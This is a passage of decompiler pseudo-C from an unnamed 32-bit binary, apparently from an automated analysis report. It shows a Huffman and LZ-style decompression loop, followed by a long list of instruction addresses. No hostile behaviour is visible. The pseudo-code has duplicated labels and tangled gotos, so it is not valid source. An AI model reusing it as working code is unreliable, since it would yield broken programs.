    							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
    								L20:
    								_t627 = 0xf;
    								_t316 = _t315 + 1;
    								__eflags = _t316 - _t627;
    								if(_t316 >= _t627) {
    									L26:
    									_t486 =  *(_t643 + 4) + _t627;
    									 *(_t643 + 4) = _t486 & 0x00000007;
    									_t318 = _t486 >> 3;
    									 *_t643 =  *_t643 + _t318;
    									_t488 = 0x10;
    									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
    									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
    									asm("sbb eax, eax");
    									_t319 = _t318 & _t491;
    									__eflags = _t319;
    									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
    									goto L27;
    								} else {
    									_t591 = _t638 + (_t316 + 0x29) * 4;
    									while(1) {
    										L22:
    										__eflags = _t600 -  *_t591;
    										if(_t600 <  *_t591) {
    											_t627 = _t316;
    											goto L26;
    										}
    										L23:
    										_t316 = _t316 + 1;
    										_t591 = _t591 + 4;
    										__eflags = _t316 - 0xf;
    										if(_t316 < 0xf) {
    											continue;
    										} else {
    											goto L26;
    										}
    									}
    									goto L26;
    								}
    							} else {
    								_t592 = 0x10;
    								_t626 = _t600 >> _t592 - _t315;
    								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
    								 *_t643 =  *_t643 + (_t595 >> 3);
    								 *(_t643 + 4) = _t595 & 0x00000007;
    								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
    								L27:
    								__eflags = _t460 - 0x100;
    								if(_t460 >= 0x100) {
    									L31:
    									__eflags = _t460 - 0x106;
    									if(_t460 < 0x106) {
    										L96:
    										__eflags = _t460 - 0x100;
    										if(_t460 != 0x100) {
    											L102:
    											__eflags = _t460 - 0x101;
    											if(_t460 != 0x101) {
    												L129:
    												_t461 = _t460 + 0xfffffefe;
    												__eflags = _t461;
    												_t493 = _t638 + (_t461 + 0x18) * 4;
    												_t603 =  *_t493;
    												 *(_t658 + 0x30) = _t603;
    												if(_t461 == 0) {
    													L131:
    													 *(_t638 + 0x60) = _t603;
    													_t320 = E0083A591(_t643);
    													_t321 =  *(_t638 + 0x2de8);
    													_t605 = _t320 & 0x0000fffe;
    													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
    													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
    														L133:
    														_t628 = 0xf;
    														_t322 = _t321 + 1;
    														__eflags = _t322 - _t628;
    														if(_t322 >= _t628) {
    															L139:
    															_t496 =  *(_t643 + 4) + _t628;
    															 *(_t643 + 4) = _t496 & 0x00000007;
    															_t324 = _t496 >> 3;
    															 *_t643 =  *_t643 + _t324;
    															_t498 = 0x10;
    															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
    															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
    															asm("sbb eax, eax");
    															_t325 = _t324 & _t501;
    															__eflags = _t325;
    															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
    															L140:
    															_t629 = _t326 & 0x0000ffff;
    															__eflags = _t629 - 8;
    															if(_t629 >= 8) {
    																_t464 = (_t629 >> 2) - 1;
    																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
    																__eflags = _t629;
    															} else {
    																_t464 = 0;
    															}
    															_t632 = _t629 + 2;
    															__eflags = _t464;
    															if(_t464 != 0) {
    																_t391 = E0083A591(_t643);
    																_t525 = 0x10;
    																_t632 = _t632 + (_t391 >> _t525 - _t464);
    																_t528 =  *(_t643 + 4) + _t464;
    																 *_t643 =  *_t643 + (_t528 >> 3);
    																_t529 = _t528 & 0x00000007;
    																__eflags = _t529;
    																 *(_t643 + 4) = _t529;
    															}
    															__eflags =  *((char*)(_t638 + 0x4c44));
    															_t608 =  *(_t658 + 0x30);
    															 *(_t638 + 0x74) = _t632;
    															if( *((char*)(_t638 + 0x4c44)) == 0) {
    																L147:
    																_t503 =  *(_t638 + 0x7c);
    																_t466 = _t503 - _t608;
    																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
    																__eflags = _t466 - _t328;
    																if(_t466 >= _t328) {
    																	L158:
    																	__eflags = _t632;
    																	if(_t632 == 0) {
    																		while(1) {
    																			L0:
    																			_t638 = __esi;
    																			_t598 = __esi + 0x7c;
    																			goto L1;
    																		}
    																	}
    																	L159:
    																	_t644 =  *(_t638 + 0xe6dc);
    																	do {
    																		L160:
    																		_t645 = _t644 & _t466;
    																		_t466 = _t466 + 1;
    																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
    																		_t598 = _t638 + 0x7c;
    																		_t644 =  *(_t638 + 0xe6dc);
    																		 *_t598 =  *_t598 + 0x00000001 & _t644;
    																		_t632 = _t632 - 1;
    																		__eflags = _t632;
    																	} while (_t632 != 0);
    																	goto L161;
    																}
    																L148:
    																__eflags = _t503 - _t328;
    																if(_t503 >= _t328) {
    																	goto L158;
    																}
    																L149:
    																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
    																_t468 = _t466 + _t333;
    																_t646 = _t333 + _t503;
    																 *(_t638 + 0x7c) = _t503 + _t632;
    																__eflags = _t608 - _t632;
    																if(_t608 >= _t632) {
    																	L154:
    																	__eflags = _t632 - 8;
    																	if(_t632 < 8) {
    																		goto L117;
    																	}
    																	L155:
    																	_t347 = _t632 >> 3;
    																	__eflags = _t347;
    																	 *(_t658 + 0x30) = _t347;
    																	_t639 = _t347;
    																	do {
    																		L156:
    																		E0084EA80(_t646, _t468, 8);
    																		_t658 = _t658 + 0xc;
    																		_t468 = _t468 + 8;
    																		_t646 = _t646 + 8;
    																		_t632 = _t632 - 8;
    																		_t639 = _t639 - 1;
    																		__eflags = _t639;
    																	} while (_t639 != 0);
    																	goto L116;
    																}
    																L150:
    																_t611 = 8;
    																__eflags = _t632 - _t611;
    																if(_t632 < _t611) {
    																	goto L117;
    																}
    																L151:
    																_t511 = _t632 >> 3;
    																__eflags = _t511;
    																do {
    																	L152:
    																	_t632 = _t632 - _t611;
    																	 *_t646 =  *_t468;
    																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
    																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
    																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
    																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
    																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
    																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
    																	_t356 =  *((intOrPtr*)(_t468 + 7));
    																	_t468 = _t468 + _t611;
    																	 *((char*)(_t646 + 7)) = _t356;
    																	_t646 = _t646 + _t611;
    																	_t511 = _t511 - 1;
    																	__eflags = _t511;
    																} while (_t511 != 0);
    																goto L117;
    															} else {
    																L146:
    																_push( *(_t638 + 0xe6dc));
    																_push(_t638 + 0x7c);
    																_push(_t608);
    																L71:
    																_push(_t632);
    																E00842161();
    																goto L0;
    																do {
    																	while(1) {
    																		L0:
    																		_t638 = __esi;
    																		_t598 = __esi + 0x7c;
    																		do {
    																			while(1) {
    																				L1:
    																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
    																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
    																					goto L12;
    																				} else {
    																					_t637 = _t638 + 0x8c;
    																				}
    																				goto L3;
    																			}
    																			goto L103;
    																		} while (_t632 == 0);
    																		__eflags =  *((char*)(_t638 + 0x4c44));
    																		if( *((char*)(_t638 + 0x4c44)) == 0) {
    																			L106:
    																			_t537 =  *(_t638 + 0x7c);
    																			_t614 =  *(_t638 + 0x60);
    																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
    																			_t468 = _t537 - _t614;
    																			__eflags = _t468 - _t399;
    																			if(_t468 >= _t399) {
    																				L125:
    																				__eflags = _t632;
    																				if(_t632 == 0) {
    																					while(1) {
    																						L0:
    																						_t638 = __esi;
    																						_t598 = __esi + 0x7c;
    																						L1:
    																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
    																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
    																							goto L12;
    																						} else {
    																							_t637 = _t638 + 0x8c;
    																						}
    																					}
    																				}
    																				L126:
    																				_t648 =  *(_t638 + 0xe6dc);
    																				do {
    																					L127:
    																					_t649 = _t648 & _t468;
    																					_t468 = _t468 + 1;
    																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
    																					_t598 = _t638 + 0x7c;
    																					_t648 =  *(_t638 + 0xe6dc);
    																					 *_t598 =  *_t598 + 0x00000001 & _t648;
    																					_t632 = _t632 - 1;
    																					__eflags = _t632;
    																				} while (_t632 != 0);
    																				L161:
    																				_t643 = _t638 + 4;
    																				goto L1;
    																			}
    																			L107:
    																			__eflags = _t537 - _t399;
    																			if(_t537 >= _t399) {
    																				goto L125;
    																			}
    																			L108:
    																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
    																			_t468 = _t468 + _t400;
    																			_t646 = _t400 + _t537;
    																			 *(_t638 + 0x7c) = _t537 + _t632;
    																			__eflags = _t614 - _t632;
    																			if(_t614 >= _t632) {
    																				L113:
    																				__eflags = _t632 - 8;
    																				if(_t632 < 8) {
    																					L117:
    																					_t598 = _t638 + 0x7c;
    																					__eflags = _t632;
    																					if(_t632 == 0) {
    																						goto L161;
    																					}
    																					L118:
    																					_t598 = _t638 + 0x7c;
    																					 *_t646 =  *_t468;
    																					__eflags = _t632 - 1;
    																					if(_t632 <= 1) {
    																						goto L161;
    																					}
    																					L119:
    																					_t598 = _t638 + 0x7c;
    																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
    																					__eflags = _t632 - 2;
    																					if(_t632 <= 2) {
    																						goto L161;
    																					}
    																					L120:
    																					_t598 = _t638 + 0x7c;
    																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
    																					__eflags = _t632 - 3;
    																					if(_t632 <= 3) {
    																						goto L161;
    																					}
    																					L121:
    																					_t598 = _t638 + 0x7c;
    																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
    																					__eflags = _t632 - 4;
    																					if(_t632 <= 4) {
    																						goto L161;
    																					}
    																					L122:
    																					_t598 = _t638 + 0x7c;
    																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
    																					__eflags = _t632 - 5;
    																					if(_t632 <= 5) {
    																						goto L161;
    																					}
    																					L123:
    																					_t598 = _t638 + 0x7c;
    																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
    																					__eflags = _t632 - 6;
    																					if(_t632 <= 6) {
    																						goto L161;
    																					}
    																					L124:
    																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
    																					while(1) {
    																						L0:
    																						_t638 = __esi;
    																						_t598 = __esi + 0x7c;
    																						goto L1;
    																					}
    																				}
    																				L114:
    																				_t403 = _t632 >> 3;
    																				__eflags = _t403;
    																				 *(_t658 + 0x30) = _t403;
    																				_t641 = _t403;
    																				do {
    																					L115:
    																					E0084EA80(_t646, _t468, 8);
    																					_t658 = _t658 + 0xc;
    																					_t468 = _t468 + 8;
    																					_t646 = _t646 + 8;
    																					_t632 = _t632 - 8;
    																					_t641 = _t641 - 1;
    																					__eflags = _t641;
    																				} while (_t641 != 0);
    																				L116:
    																				_t638 =  *((intOrPtr*)(_t658 + 0x10));
    																				goto L117;
    																			}
    																			L109:
    																			_t615 = 8;
    																			__eflags = _t632 - _t615;
    																			if(_t632 < _t615) {
    																				goto L117;
    																			}
    																			L110:
    																			_t539 = _t632 >> 3;
    																			__eflags = _t539;
    																			do {
    																				L111:
    																				_t632 = _t632 - _t615;
    																				 *_t646 =  *_t468;
    																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
    																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
    																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
    																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
    																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
    																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
    																				_t412 =  *((intOrPtr*)(_t468 + 7));
    																				_t468 = _t468 + _t615;
    																				 *((char*)(_t646 + 7)) = _t412;
    																				_t646 = _t646 + _t615;
    																				_t539 = _t539 - 1;
    																				__eflags = _t539;
    																			} while (_t539 != 0);
    																			goto L117;
    																		}
    																		L105:
    																		_push( *(_t638 + 0xe6dc));
    																		_push(_t638 + 0x7c);
    																		_push( *(_t638 + 0x60));
    																		goto L71;
    																	}
    																	L98:
    																	_t417 = E00841A81(_t638, _t658 + 0x1c);
    																	__eflags = _t417;
    																} while (_t417 != 0);
    																goto L99;
    															}
    														}
    														L134:
    														_t531 = _t638 + (_t322 + 0xb5a) * 4;
    														while(1) {
    															L135:
    															__eflags = _t605 -  *_t531;
    															if(_t605 <  *_t531) {
    																break;
    															}
    															L136:
    															_t322 = _t322 + 1;
    															_t531 = _t531 + 4;
    															__eflags = _t322 - 0xf;
    															if(_t322 < 0xf) {
    																continue;
    															}
    															L137:
    															goto L139;
    														}
    														L138:
    														_t628 = _t322;
    														goto L139;
    													}
    													L132:
    													_t532 = 0x10;
    													_t613 = _t605 >> _t532 - _t321;
    													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
    													 *_t643 =  *_t643 + (_t535 >> 3);
    													 *(_t643 + 4) = _t535 & 0x00000007;
    													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
    													goto L140;
    												} else {
    													goto L130;
    												}
    												do {
    													L130:
    													 *_t493 =  *(_t493 - 4);
    													_t493 = _t493 - 4;
    													_t461 = _t461 - 1;
    													__eflags = _t461;
    												} while (_t461 != 0);
    												goto L131;
    											}
    											L103:
    											_t632 =  *(_t638 + 0x74);
    											_t598 = _t638 + 0x7c;
    											__eflags = _t632;
    										}
    										L97:
    										_push(_t658 + 0x1c);
    										_t414 = E008435D7(_t638, _t643);
    										__eflags = _t414;
    										if(_t414 == 0) {
    											goto L99;
    										}
    										goto L98;
    									}
    									L32:
    									_t634 = _t460 - 0x106;
    									__eflags = _t634 - 8;
    									if(_t634 >= 8) {
    										_t478 = (_t634 >> 2) - 1;
    										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
    										__eflags = _t634;
    									} else {
    										_t478 = 0;
    									}
    									_t632 = _t634 + 2;
    									__eflags = _t478;
    									if(_t478 != 0) {
    										_t444 = E0083A591(_t643);
    										_t582 = 0x10;
    										_t632 = _t632 + (_t444 >> _t582 - _t478);
    										_t585 =  *(_t643 + 4) + _t478;
    										 *_t643 =  *_t643 + (_t585 >> 3);
    										_t586 = _t585 & 0x00000007;
    										__eflags = _t586;
    										 *(_t643 + 4) = _t586;
    									}
    									_t418 = E0083A591(_t643);
    									_t419 =  *(_t638 + 0x1010);
    									_t617 = _t418 & 0x0000fffe;
    									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
    									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
    										L39:
    										_t479 = 0xf;
    										_t420 = _t419 + 1;
    										__eflags = _t420 - _t479;
    										if(_t420 >= _t479) {
    											L45:
    											_t546 =  *(_t643 + 4) + _t479;
    											 *(_t643 + 4) = _t546 & 0x00000007;
    											_t422 = _t546 >> 3;
    											 *_t643 =  *_t643 + _t422;
    											_t548 = 0x10;
    											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
    											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
    											asm("sbb eax, eax");
    											_t423 = _t422 & _t551;
    											__eflags = _t423;
    											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
    											goto L46;
    										}
    										L40:
    										_t575 = _t638 + (_t420 + 0x3e4) * 4;
    										while(1) {
    											L41:
    											__eflags = _t617 -  *_t575;
    											if(_t617 <  *_t575) {
    												break;
    											}
    											L42:
    											_t420 = _t420 + 1;
    											_t575 = _t575 + 4;
    											__eflags = _t420 - 0xf;
    											if(_t420 < 0xf) {
    												continue;
    											}
    											L43:
    											goto L45;
    										}
    										L44:
    										_t479 = _t420;
    										goto L45;
    									} else {
    										L38:
    										_t576 = 0x10;
    										_t625 = _t617 >> _t576 - _t419;
    										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
    										 *_t643 =  *_t643 + (_t579 >> 3);
    										 *(_t643 + 4) = _t579 & 0x00000007;
    										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
    										L46:
    										_t425 = _t424 & 0x0000ffff;
    										__eflags = _t425 - 4;
    										if(_t425 >= 4) {
    											_t643 = (_t425 >> 1) - 1;
    											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
    											__eflags = _t425;
    										} else {
    											_t643 = 0;
    										}
    										_t428 = _t425 + 1;
    										 *(_t658 + 0x14) = _t428;
    										_t471 = _t428;
    										 *(_t658 + 0x30) = _t471;
    										__eflags = _t643;
    										if(_t643 == 0) {
    											L64:
    											_t643 = _t638 + 4;
    											goto L65;
    										} else {
    											L50:
    											__eflags = _t643 - 4;
    											if(__eflags < 0) {
    												L72:
    												_t359 = E00847DE9(_t638 + 4);
    												_t514 = 0x20;
    												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x14);
    												_t517 =  *(_t638 + 8) + _t643;
    												 *(_t658 + 0x30) = _t471;
    												_t643 = _t638 + 4;
    												 *_t643 =  *_t643 + (_t517 >> 3);
    												 *(_t643 + 4) = _t517 & 0x00000007;
    												L65:
    												__eflags = _t471 - 0x100;
    												if(_t471 > 0x100) {
    													_t632 = _t632 + 1;
    													__eflags = _t471 - 0x2000;
    													if(_t471 > 0x2000) {
    														_t632 = _t632 + 1;
    														__eflags = _t471 - 0x40000;
    														if(_t471 > 0x40000) {
    															_t632 = _t632 + 1;
    															__eflags = _t632;
    														}
    													}
    												}
    												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
    												 *(_t638 + 0x68) =  *(_t638 + 0x64);
    												 *(_t638 + 0x64) =  *(_t638 + 0x60);
    												 *(_t638 + 0x60) = _t471;
    												__eflags =  *((char*)(_t638 + 0x4c44));
    												 *(_t638 + 0x74) = _t632;
    												if( *((char*)(_t638 + 0x4c44)) == 0) {
    													L73:
    													_t598 = _t638 + 0x7c;
    													_t519 =  *_t598;
    													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
    													_t651 = _t519 - _t471;
    													__eflags = _t651 - _t366;
    													if(_t651 >= _t366) {
    														L92:
    														__eflags = _t632;
    														if(_t632 == 0) {
    															goto L161;
    														}
    														L93:
    														_t472 =  *(_t638 + 0xe6dc);
    														do {
    															L94:
    															_t473 = _t472 & _t651;
    															_t651 = _t651 + 1;
    															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
    															_t598 = _t638 + 0x7c;
    															_t472 =  *(_t638 + 0xe6dc);
    															 *_t598 =  *_t598 + 0x00000001 & _t472;
    															_t632 = _t632 - 1;
    															__eflags = _t632;
    														} while (_t632 != 0);
    														goto L161;
    													}
    													L74:
    													__eflags = _t519 - _t366;
    													if(_t519 >= _t366) {
    														goto L92;
    													}
    													L75:
    													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
    													_t474 = _t371 + _t651;
    													_t652 = _t371 + _t519;
    													 *_t598 = _t519 + _t632;
    													__eflags =  *(_t658 + 0x30) - _t632;
    													if( *(_t658 + 0x30) >= _t632) {
    														L80:
    														__eflags = _t632 - 8;
    														if(_t632 < 8) {
    															L84:
    															__eflags = _t632;
    															if(_t632 != 0) {
    																 *_t652 =  *_t474;
    																__eflags = _t632 - 1;
    																if(_t632 > 1) {
    																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
    																	__eflags = _t632 - 2;
    																	if(_t632 > 2) {
    																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
    																		__eflags = _t632 - 3;
    																		if(_t632 > 3) {
    																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
    																			__eflags = _t632 - 4;
    																			if(_t632 > 4) {
    																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
    																				__eflags = _t632 - 5;
    																				if(_t632 > 5) {
    																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
    																					__eflags = _t632 - 6;
    																					if(_t632 > 6) {
    																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
    																					}
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    															goto L161;
    														}
    														L81:
    														_t381 = _t632 >> 3;
    														__eflags = _t381;
    														 *(_t658 + 0x30) = _t381;
    														_t640 = _t381;
    														do {
    															L82:
    															E0084EA80(_t652, _t474, 8);
    															_t658 = _t658 + 0xc;
    															_t474 = _t474 + 8;
    															_t652 = _t652 + 8;
    															_t632 = _t632 - 8;
    															_t640 = _t640 - 1;
    															__eflags = _t640;
    														} while (_t640 != 0);
    														_t638 =  *((intOrPtr*)(_t658 + 0x10));
    														_t598 =  *(_t658 + 0x18);
    														goto L84;
    													}
    													L76:
    													__eflags = _t632 - 8;
    													if(_t632 < 8) {
    														goto L84;
    													}
    													L77:
    													_t522 = _t632 >> 3;
    													__eflags = _t522;
    													do {
    														L78:
    														_t632 = _t632 - 8;
    														 *_t652 =  *_t474;
    														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
    														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
    														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
    														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
    														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
    														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
    														_t390 =  *((intOrPtr*)(_t474 + 7));
    														_t474 = _t474 + 8;
    														 *((char*)(_t652 + 7)) = _t390;
    														_t652 = _t652 + 8;
    														_t522 = _t522 - 1;
    														__eflags = _t522;
    													} while (_t522 != 0);
    													goto L84;
    												} else {
    													L70:
    													_push( *(_t638 + 0xe6dc));
    													_push(_t638 + 0x7c);
    													_push(_t471);
    													goto L71;
    												}
    											}
    											L51:
    											if(__eflags <= 0) {
    												_t656 = _t638 + 4;
    											} else {
    												_t439 = E00847DE9(_t638 + 4);
    												_t569 = 0x24;
    												_t572 = _t643 - 4 +  *(_t638 + 8);
    												_t656 = _t638 + 4;
    												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x14);
    												 *_t656 =  *_t656 + (_t572 >> 3);
    												 *(_t656 + 4) = _t572 & 0x00000007;
    											}
    											_t429 = E0083A591(_t656);
    											_t430 =  *(_t638 + 0x1efc);
    											_t621 = _t429 & 0x0000fffe;
    											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
    											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
    												L56:
    												_t657 = 0xf;
    												_t431 = _t430 + 1;
    												__eflags = _t431 - _t657;
    												if(_t431 >= _t657) {
    													L62:
    													_t555 =  *(_t638 + 8) + _t657;
    													 *(_t638 + 8) = _t555 & 0x00000007;
    													_t433 = _t555 >> 3;
    													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
    													_t557 = 0x10;
    													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
    													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
    													asm("sbb eax, eax");
    													_t434 = _t433 & _t560;
    													__eflags = _t434;
    													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
    													goto L63;
    												}
    												L57:
    												_t562 = _t638 + (_t431 + 0x79f) * 4;
    												while(1) {
    													L58:
    													__eflags = _t621 -  *_t562;
    													if(_t621 <  *_t562) {
    														break;
    													}
    													L59:
    													_t431 = _t431 + 1;
    													_t562 = _t562 + 4;
    													__eflags = _t431 - 0xf;
    													if(_t431 < 0xf) {
    														continue;
    													}
    													L60:
    													goto L62;
    												}
    												L61:
    												_t657 = _t431;
    												goto L62;
    											} else {
    												L55:
    												_t563 = 0x10;
    												_t624 = _t621 >> _t563 - _t430;
    												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
    												 *_t656 =  *_t656 + (_t566 >> 3);
    												 *(_t656 + 4) = _t566 & 0x00000007;
    												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
    												L63:
    												_t471 = _t471 + (_t435 & 0x0000ffff);
    												__eflags = _t471;
    												 *(_t658 + 0x30) = _t471;
    												goto L64;
    											}
    										}
    									}
    								}
    								L28:
    								__eflags =  *((char*)(_t638 + 0x4c44));
    								if( *((char*)(_t638 + 0x4c44)) == 0) {
    									L30:
    									_t598 = _t638 + 0x7c;
    									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
    									 *_t598 =  *_t598 + 1;
    									continue;
    								}
    								L29:
    								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
    								 *(E00841818(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
    								goto L0;
    							}
    						}
    						L13:
    						__eflags = _t483 -  *_t598;
    						if(_t483 ==  *_t598) {
    							goto L18;
    						}
    						L14:
    						E0084484D(_t638);
    						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
    						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
    						if(__eflags > 0) {
    							goto L100;
    						}
    						L15:
    						if(__eflags < 0) {
    							L17:
    							__eflags =  *((char*)(_t638 + 0x4c50));
    							if( *((char*)(_t638 + 0x4c50)) != 0) {
    								L162:
    								 *((char*)(_t638 + 0x4c60)) = 0;
    								goto L100;
    							}
    							goto L18;
    						}
    						L16:
    						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
    						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
    						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
    							goto L100;
    						}
    						goto L17;
    					}
    				}
    			}









































































































































    0x00845911
    0x00845911
    0x00845911
    0x00845911
    0x00845911
    0x00845914
    0x00845914
    0x0084591a
    0x00845925
    0x00000000
    0x00845927
    0x00845927
    0x00845927
    0x0084592d
    0x0084592d
    0x00845936
    0x00845939
    0x00000000
    0x00000000
    0x00845948
    0x0084594f
    0x00845efa
    0x00845efc
    0x00845f01
    0x00845f08
    0x00845f08
    0x00845955
    0x00845955
    0x00845956
    0x00845959
    0x00845960
    0x00000000
    0x00000000
    0x00845966
    0x0084596e
    0x0084596f
    0x00845970
    0x00845971
    0x00845978
    0x00000000
    0x0084597a
    0x00000000
    0x0084597a
    0x00845978
    0x0084597f
    0x00845981
    0x00845986
    0x00845988
    0x00000000
    0x0084598e
    0x0084598e
    0x0084598e
    0x00845991
    0x00845991
    0x008459a1
    0x008459a6
    0x008459e6
    0x008459e8
    0x008459ef
    0x008459f5
    0x008459fb
    0x00845a02
    0x00845a2e
    0x00845a30
    0x00845a31
    0x00845a32
    0x00845a34
    0x00845a4d
    0x00845a50
    0x00845a57
    0x00845a5a
    0x00845a5d
    0x00845a69
    0x00845a75
    0x00845a77
    0x00845a7d
    0x00845a7f
    0x00845a7f
    0x00845a81
    0x00000000
    0x00845a36
    0x00845a39
    0x00845a3c
    0x00845a3c
    0x00845a3c
    0x00845a3e
    0x00845a4b
    0x00845a4b
    0x00845a4b
    0x00845a40
    0x00845a40
    0x00845a41
    0x00845a44
    0x00845a47
    0x00000000
    0x00845a49
    0x00000000
    0x00845a49
    0x00845a47
    0x00000000
    0x00845a3c
    0x00845a04
    0x00845a06
    0x00845a09
    0x00845a13
    0x00845a1b
    0x00845a21
    0x00845a24
    0x00845a89
    0x00845a89
    0x00845a8f
    0x00845acb
    0x00845acb
    0x00845ad1
    0x00845ecd
    0x00845ecd
    0x00845ed3
    0x00845f0b
    0x00845f0b
    0x00845f11
    0x008460ae
    0x008460ae
    0x008460ae
    0x008460b7
    0x008460ba
    0x008460bc
    0x008460c0
    0x008460cf
    0x008460d1
    0x008460d4
    0x008460db
    0x008460e1
    0x008460e7
    0x008460ee
    0x0084611a
    0x0084611c
    0x0084611d
    0x0084611e
    0x00846120
    0x0084613c
    0x0084613f
    0x00846146
    0x00846149
    0x0084614c
    0x00846158
    0x00846164
    0x00846166
    0x0084616c
    0x0084616e
    0x0084616e
    0x00846170
    0x00846178
    0x00846178
    0x0084617b
    0x0084617e
